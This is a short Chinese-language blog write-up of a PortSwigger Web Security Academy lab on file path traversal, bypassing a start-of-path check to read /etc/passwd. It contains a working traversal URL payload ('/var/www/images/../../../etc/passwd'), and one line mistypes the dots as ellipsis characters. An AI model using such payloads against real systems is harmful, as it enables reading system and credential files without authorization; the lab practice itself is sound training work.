Lab: File path traversal, validation of start of path:文件路径遍历,起始路径验证
靶场内容:
本实验室在产品图片显示中存在文件路径遍历漏洞。
应用程序通过请求参数传输完整的文件路径,并验证提供的路径是否以预期的文件夹开头。
要解决实验室问题,请检索/etc/passwd文件的内容。
漏洞分析
- 打开图片链接,可以看到,图片后面跟上了绝对路径:
https://ac311fd21e5ffcf482b23580000d00a5.web-security-academy.net/image?filename=/var/www/images/29.jpg - /var和/etc一样属于一级目录
- 这个漏洞在于,它不允许相对路径的遍历,只允许绝对路径的遍历
- 所以我们只需要在后面加上…/…/…/etc/passwd即可
- https://ac311fd21e5ffcf482b23580000d00a5.web-security-academy.net/image
?filename=/var/www/images/../../../etc/passwd
关键截图:
本文来自博客园,作者:{Zeker62},转载请注明原文链接:https://www.cnblogs.com/Zeker62/p/15167713.html
